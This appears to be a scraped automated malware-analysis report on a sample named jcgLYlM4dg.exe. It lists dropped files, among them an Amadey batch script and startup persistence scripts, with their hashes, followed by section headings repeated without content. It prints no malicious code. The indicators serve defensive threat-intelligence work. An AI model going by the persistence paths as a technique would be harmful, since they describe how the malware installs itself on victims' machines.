C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat	DOS batch file, ASCII text, with very long lines (63646), with CRLF line terminators	58F99F3E10CF1E235BF64A8B65B15ABC	612213F6165DDEB405E653814565168BEA49D6A7	386069FCBC0391B84BB7DD37ADF8ABBFC5C09DBC8A358ECBCD9C4AA17E123001
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mlkuq2o.nkx.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqxn2sgn.q2x.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brfnssnu.pxr.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iv00qaod.pdx.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1ynmbvf.pgj.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kagq4ejl.d42.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mioqotm5.qac.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqcyqojc.rxg.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufh5j5hg.ks3.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnsahwpj.zai.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\startup_str_958.bat	DOS batch file, ASCII text, with very long lines (63646), with CRLF line terminators	58F99F3E10CF1E235BF64A8B65B15ABC	612213F6165DDEB405E653814565168BEA49D6A7	386069FCBC0391B84BB7DD37ADF8ABBFC5C09DBC8A358ECBCD9C4AA17E123001
C:\Users\user\AppData\Roaming\startup_str_958.vbs	ASCII text, with no line terminators	71FCDEFB6285185848A35972414426EC	7C48776237D7FB287024E7B484AB7A579B08EF49	9EF41F2FB00CB2D103EB9079647776C64A04AE8925F1F9CD65B4DCD47B7145BB

Windows Analysis Report
jcgLYlM4dg.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report jcgLYlM4dg.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
jcgLYlM4dg.exe

Malware Threat Intel
Provided by